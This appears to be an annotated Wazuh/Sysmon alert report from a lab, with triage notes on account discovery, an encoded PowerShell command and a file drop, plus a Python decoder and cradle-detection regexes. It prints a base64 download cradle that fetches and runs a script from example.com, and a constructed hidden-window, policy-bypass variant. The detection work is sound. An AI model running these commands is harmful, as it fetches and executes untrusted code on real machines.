No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.9158126Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282239
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:49.897 ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ProcessId: 1148 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1 CreationUtcTime: 2025-04-24 22:35:49.897 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:49.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:49.897
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.367+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.367+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.986279
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:51.6610611Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282272
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:51.490 ProcessGuid: {94294ddc-bcc7-680a-b50a-000000000e00} ProcessId: 10700 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} ParentProcessId: 12028 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:51.490
UTC time at which Sysmon recorded the process start. Order events by this field (or eventRecordID), not by the Wazuh ingestion timestamp, which lags by roughly a minute on this host.

data.win.eventdata.processGuid:  {94294ddc-bcc7-680a-b50a-000000000e00}
Sysmon's unique process identifier. Unlike the PID it is never reused, so pivot on it (and on parentProcessGuid) to rebuild the process tree.

data.win.eventdata.processId:  10700
Windows PID. PIDs are recycled after exit, so use it only together with processGuid or utcTime.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
Full path of the executable. This is the 32-bit copy under SysWOW64 even though the command line names system32: WOW64 file-system redirection does that for any 32-bit parent, such as the agent installed under Program Files (x86).

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version string from the PE version resource. Attacker-built binaries can claim anything here, so it is a hint, not proof of origin.

data.win.eventdata.description:  Net Command
Description string from the PE version resource; forgeable, same caveat as fileVersion.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; forgeable.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; forgeable. A Microsoft value on a binary outside a Windows directory is a red flag, not reassurance.

data.win.eventdata.originalFileName:  net1.exe
File name compiled into the PE version resource. If it ever differs from the basename of image, the binary was renamed on disk, a common way to hide living-off-the-land tools. Here they match.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
Exact command line. net.exe always hands its work to net1.exe, so net1 user <name> appears whenever net user <name> runs; the question that matters is what launched the net.exe parent.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory, inherited from the parent. The Wazuh agent's own install directory points at the agent as the originator of this command chain.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as; the local SYSTEM account here.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon's identifier for the logon session; constant for everything started in that session.

data.win.eventdata.logonId:  0x3e7
Windows logon session ID. 0x3e7 (999) is always the local SYSTEM session, consistent with the user field.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: this was started by a service, not from a logged-on desktop.

data.win.eventdata.integrityLevel:  System
Integrity level of the process token. System is the highest; whatever this chain does runs fully privileged.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hash of the image file using the algorithms configured in Sysmon (only SHA256 here). Compare with a known-good net1.exe from the same Windows build before trusting the version metadata.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc5-680a-b10a-000000000e00}
Sysmon GUID of the parent; look up its own Process Create event to continue up the tree.

data.win.eventdata.parentProcessId:  12028
PID of the parent; recycled after exit, so prefer the GUID.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
Executable that spawned net1.exe. net.exe delegating to net1.exe is normal; what launched net.exe (PID 12028) is the real question, so follow parentProcessGuid.

data.win.eventdata.parentCommandLine:  net user administrator
Command line of the parent, confirming this chain is a query of the administrator account.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as; the same SYSTEM account, so no privilege change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:55.508+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.991423
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; identical on every host, so it is a safe filter key.

data.win.system.eventID:  1
Event ID in the provider's own numbering. For Sysmon, 1 = Process Create (this event); the 4624/4688 numbers belong to the Security channel only.

data.win.system.version:  5
Schema version of the event template. Field layout can change between versions, so check this first when a parser breaks after a Sysmon upgrade.

data.win.system.level:  4
Numeric event level; 4 = Informational. Sysmon writes everything at this level, so it carries no severity signal.

data.win.system.task:  1
Task category of the event. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:52.6827009Z
UTC time the event was written to the event log. Compare with data.win.eventdata.utcTime (when Sysmon observed the event) and the Wazuh timestamp (when the manager received it).

data.win.system.eventRecordID:  282279
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process the event describes (that one is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event; same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent read this from. Sysmon events live in their own Operational channel, not in Security, so make sure this channel is in the agent's localfile configuration on every host.

data.win.system.computer:  Attacker
Hostname recorded inside the event; should match agent.name. A mismatch means an agent is forwarding another host's logs.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:50.858 ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ProcessId: 9592 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ParentProcessId: 1148 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full Sysmon event text as rendered by the provider. Every data.win.eventdata.* field below is parsed out of it, so fall back to this when a parsed field looks truncated or mis-decoded.

data.win.eventdata.utcTime:  2025-04-24 22:35:50.858
UTC time at which Sysmon recorded the process start: about 65 seconds before the Wazuh timestamp of 22:36:55.508. Order events by this field (or eventRecordID), not by the ingestion timestamp.

data.win.eventdata.processGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
Sysmon's unique process identifier. Unlike the PID it is never reused, so pivot on it (and on parentProcessGuid) to rebuild the process tree. The File Create alert that follows carries this same GUID.

data.win.eventdata.processId:  9592
Windows PID. PIDs are recycled after exit, so use it only together with processGuid or utcTime.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable: the legitimate 64-bit Windows PowerShell 5.1 binary in its expected location.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE version resource. Attacker-built binaries can claim anything here, so it is a hint, not proof of origin.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource; forgeable, same caveat as fileVersion.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; forgeable.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; forgeable.

data.win.eventdata.originalFileName:  PowerShell.EXE
File name compiled into the PE version resource. It matches the basename of image (case aside), so the binary was not renamed on disk.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process and the key field of this alert. -NoLogo -NoProfile -EncodedCommand <base64> is the classic loader shape; the argument is UTF-16LE text, base64-encoded, and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): fetch a script from a URL and run it in memory without touching disk. The URL is the pivot into proxy and DNS logs. Note also that the executable path appears twice and that the parent command line below is identical.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process: the user's profile root, not a download or temp folder.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as, in machine\user form; a local account on host Attacker.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's identifier for the logon session; constant for everything started in that session.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (LUID). Match it against the LogonId in Security event 4624 on this host to learn how and when this user session was created.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 is an interactive desktop session, so this ran in a logged-on user's desktop, not as a service.

data.win.eventdata.integrityLevel:  Medium
Integrity level of the process token. Medium is a normal, non-elevated user process: no privilege escalation has happened at this point, and the cradle runs with Attcker1's rights only.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file using the algorithms configured in Sysmon (only SHA256 here). Check it against a known-good powershell.exe from build 26100: a mismatch on a system binary means tampering, a match means the attacker used the legitimate interpreter, which is the expected case for this technique.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
Sysmon GUID of the parent; look up its own Process Create event to continue up the tree.

data.win.eventdata.parentProcessId:  1148
PID of the parent; recycled after exit, so prefer the GUID.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that spawned this process. PowerShell spawning PowerShell is the condition rule 92057 matched on.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Identical to the child's command line, encoded payload included, so PID 1148 re-launched PowerShell with the same payload rather than originating it. Walk up from parentProcessGuid to find the first PowerShell instance and whatever started it; that process, not this pair, is the initial access lead.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as; the same user as the child, so no privilege change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
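First thing to do with this alert, shown as an added example (the code is ours, not SOCscribe's or Wazuh's): decode the -EncodedCommand argument and flag download-cradle indicators before deciding on containment. SAMPLE_ALERT_CMDLINE is this alert's data.win.eventdata.commandLine; SAMPLE_SHORT_SWITCHES is a constructed variant of the same payload using the abbreviated switches attackers usually prefer. The function names and the indicator list are this example's own.

```python
"""Decode PowerShell -EncodedCommand payloads from Sysmon Process Create
command lines and flag download-cradle indicators.

Added example for this report, not SOCscribe or Wazuh code. SAMPLE_ALERT_CMDLINE
is this alert's data.win.eventdata.commandLine; SAMPLE_SHORT_SWITCHES is a
constructed variant of the same payload using abbreviated switches.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec.
_ENCODED_SWITCH = "encodedcommand"

# Patterns a cradle or loader leaves in the decoded script or the outer command line.
CRADLE_PATTERNS: Dict[str, re.Pattern] = {
    "IEX": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "WebClient": re.compile(r"Net\.WebClient", re.I),
    "DownloadString": re.compile(r"\.Download(?:String|File|Data)\s*\(", re.I),
    "Invoke-WebRequest": re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I),
    "FromBase64String": re.compile(r"FromBase64String", re.I),
    "HiddenWindow": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "BypassExecutionPolicy": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

B64_PAYLOAD = (  # verbatim from this alert's commandLine
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
SAMPLE_ALERT_CMDLINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand " + B64_PAYLOAD
)
# Constructed: same payload, short switches, hidden window, policy bypass.
SAMPLE_SHORT_SWITCHES = "powershell -nop -w hidden -ep bypass -enc " + B64_PAYLOAD


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument that follows an -EncodedCommand style switch."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name = tok.lstrip("-").lower()
        if name == "ec" or (name and _ENCODED_SWITCH.startswith(name)):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text, base64 encoded; tolerate lost padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def analyse_command_line(cmdline: str) -> dict:
    """Decode the payload (if any) and report indicators and URLs for triage."""
    b64 = extract_encoded_command(cmdline)
    script = decode_encoded_command(b64) if b64 else cmdline
    hits: List[str] = [n for n, p in CRADLE_PATTERNS.items() if p.search(script)]
    # Window-style and execution-policy switches sit on the outer command line.
    for name in ("HiddenWindow", "BypassExecutionPolicy"):
        if name not in hits and CRADLE_PATTERNS[name].search(cmdline):
            hits.append(name)
    return {"encoded": b64 is not None, "script": script,
            "indicators": hits, "urls": URL_RE.findall(script)}


if __name__ == "__main__":
    for sample in (SAMPLE_ALERT_CMDLINE, SAMPLE_SHORT_SWITCHES):
        result = analyse_command_line(sample)
        print(result["script"], result["indicators"], result["urls"], sep="\n")
```

Run it against the commandLine of every PowerShell alert in the batch and pivot on the URLs it returns; a decoded script that only reads registry keys or lists services is a different investigation from one that pulls and executes remote code.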

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:55.509+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.509+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.999485
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the eventID below uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; identical on every host, so it is a safe filter key.

data.win.system.eventID:  11
Event ID in the provider's own numbering. For Sysmon, 11 = File Create (this event); the 4624/4688 numbers belong to the Security channel only.

data.win.system.version:  2
Schema version of the event template. Field layout can change between versions, so check this first when a parser breaks after a Sysmon upgrade.

data.win.system.level:  4
Numeric event level; 4 = Informational. Sysmon writes everything at this level, so it carries no severity signal.

data.win.system.task:  11
Task category of the event. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:52.8943928Z
UTC time the event was written to the event log. Compare with data.win.eventdata.utcTime (when Sysmon observed the event) and the Wazuh timestamp (when the manager received it).

data.win.system.eventRecordID:  282280
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process the event describes (that one is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event; same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent read this from. Sysmon events live in their own Operational channel, not in Security.

data.win.system.computer:  Attacker
Hostname recorded inside the event; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:52.870 ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ProcessId: 9592 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1 CreationUtcTime: 2025-04-24 22:35:52.870 User: Attacker\Attcker1"
Full Sysmon event text as rendered by the provider. Every data.win.eventdata.* field below is parsed out of it, so fall back to this when a parsed field looks truncated or mis-decoded.

data.win.eventdata.utcTime:  2025-04-24 22:35:52.870
UTC time at which Sysmon recorded the file creation: two seconds after the PowerShell process in the previous alert started, which is consistent with PowerShell's own start-up behaviour.

data.win.eventdata.processGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
GUID of the process that created the file. It is the same PowerShell instance as the encoded-command alert (PID 9592), so these two alerts are one chain of events, not two incidents.

